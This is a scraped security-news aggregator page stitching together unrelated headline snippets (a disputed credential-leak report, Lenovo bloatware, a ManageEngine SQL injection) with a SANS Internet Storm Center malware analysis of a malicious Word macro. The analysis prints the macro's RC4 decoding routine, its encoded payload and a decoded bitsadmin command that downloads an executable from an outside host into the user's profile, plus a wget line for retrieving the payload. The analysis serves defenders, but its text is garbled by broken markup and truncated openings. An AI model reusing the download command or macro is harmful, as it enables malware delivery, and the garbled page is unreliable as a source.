Hackin9

(credit: CBS)

Earlier this week, mass panic ensued when a security firm reported the recovery of a whopping 272 million account credentials belonging to users of Gmail, Microsoft, Yahoo, and a variety of overseas services. "Big data breaches found at major email services" warned Reuters, the news service that broke the news. Within hours, other news services were running stories based on the report with headlines like "Tech experts: Change your email password now."

Since then, both Google and a Russia-based e-mail service unveiled analyses that call into question the validity of the security firm's entire report.

"More than 98% of the Google account credentials in this research turned out to be bogus," a Google representative wrote in an e-mail. "As we always do in this type of situation, we increased the level of login protection for users that may have been affected." According to the report, the compromised credential list included logins to almost 23 million Gmail accounts.

Read 11 remaining paragraphs | Comments

 

Softpedia News

Lenovo Bloatware Patched to Fix System Takeover Bug
Softpedia News
This incident became infamous in infosec circles as Superfish. Later in December, security researchers from LizardHQ discovered three different issues in the bloatware of Dell, Toshiba, and Lenovo devices. In that incident, Lenovo's Solution Center ...

and more »
 

Engadget

How Armenian gangsters blew up the fingerprint-password debate
Engadget
Surfacing in the news this week with drama, it's an unprecedented revelation that has divided legal experts and given our collective Big Brother paranoia and infosec hysteria a shot in the arm that we really didn't need. The decision came in record ...

 
Re: ManageEngine Applications Manager Build No: 12700 Information Disclosure and Un-Authenticated SQL injection.
 
ManageEngine Applications Manager Build No: 12700 Information Disclosure and Un-Authenticated SQL injection.
 

Techworm

Google competitor DuckDuckGo is giving away $225000 to support open source
Techworm
Itsy bitsy Google competitor, DuckDuckGo is doing its bit to help support open source. It doesnt have a big money purse like Google but it is giving away $225,000 to support open source development. Paoli-based DuckDuckGo is a search engine that doesn ...

and more »
 

ay ago,I found an interesting malicious Word document. First of all, the file has a very low score on VT:2/56 (analysis is available here). The document is a classic one:Once opened, it asks the victim to enable macro execution if not yet enabled. The document targets" />">">The OLE document contains"> $ oledump.py b2a9d203bb135b54319a9e5cafc43824 1: 113 \x01CompObj 2: 4096 \x05DocumentSummaryInformation 3: 4096 \x05SummaryInformation 4: 9398 1Table 5: 193456 Data 6: 448 Macros/PROJECT 7: 41 Macros/PROJECTwm 8: M 18073 Macros/VBA/ThisDocument 9: 3584 Macros/VBA/_VBA_PROJECT 10: 522 Macros/VBA/dir 11: 4096 WordDocument">The analysis of the macro is"> ushdushdu = FlushCells(776129CAECFBE48F01DAC78C40B872BB1A005253F63151B2B093CA272A3C6DE382BE1AAA6586BDBC2E6579E5AF8A0BDE5D798979972BD193590479E79DBC27BD7B085F20B0304720326D6426885FD2B14A84D6A55FADF25589DF1D2B8DC244B62008AB4DB9BBDBE715C1F1EF29AFCDB1DA4DEA5F3020B871E02BA9CD4DE638D7FBB903A1D95A11F3F7816FE6BB237F3688217CBB8C3C3351C8BA766C054B4F7D0F35C35B074241D93F74F2A02BCD79251D3511CC770CF503A2409FF5C9944ADE53B2685A0968FB466874AF8929C7A82827726278EC4B4076AA84AC430150AFB20C3A4DC94B264C2382DDA6A9F70C17D8618B0A0759340A4D840D2A222612125892136E316DF67ED314739477463BF101C06454BCA61F9B45BA7A82CDD6FB24A3A678C3A1E804955CAB28A3036D0C86B2A38FDDC270B538C2394982AF2B206507927DA47885E53BD9B4A0E196EA4B05FE)">The function FlushCells is used to decode this"> Public Function FlushCells(text) Dim sbox(256) As Integer Dim key(256) As Integer Dim Text2 As String Dim temp As Integer Dim a As Long Dim i As Integer Dim j As Integer Dim k As Long Dim w As Integer Dim cipherby As Integer Dim cipher As String For w = 1 To Len(text) Step 2 Text2 = Text2 Chr(Dec(Mid$(text, w, 2))) Next i = 0 j = 0 jkddd = skdjr encryptkey = Trafalgar picnicking widower insights competitors leprechaun windmilling primp dueling campers RC4Initialize encryptkey, key, sbox For a = 1 To Len(Text2) jkddd = jkddd + i = (i + 1) Mod 256 j = (j + sbox(i)) Mod 256 temp = sbox(i) sbox(i) = sbox(j) sbox(j) = temp k = sbox((sbox(i) + sbox(j)) Mod 256) cipherby = Asc(Mid$(Text2, a, 1)) Xor k cipher = cipher Chr(cipherby) Next FlushCells = cipher"> ping 127.0.0.1 -n 3nullbitsadmin /transfer myjob /download /priority high http://ads.metrofamilyzine.com/ef9a0c52/7e4ccb5.bin %APPDATA%\27dgdte72.exenul">This is the interesting part. Instead of using a classic Microsoft.XMLHTTP object, the macro download the payload via the tool Bitsadmin. Bitsadmin is a command line tool used to create download or upload jobs and monitor their progress. It is available by default since Windows 7 or Windows Server 2008 R2.BITS stands for Background Intelligent Transfer Service.">">Bitsadmin uses its ownspecific User-Agent that is checked by the compromisedwebsite to prevent direct downloads.You must use this one to access the payload: Microsoft BITS/7.5"> $ wget --user-agent=Microsoft BITS/7.5">The analyze of the payload is here(VT score: 4/56).

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Internet Storm Center Infocon Status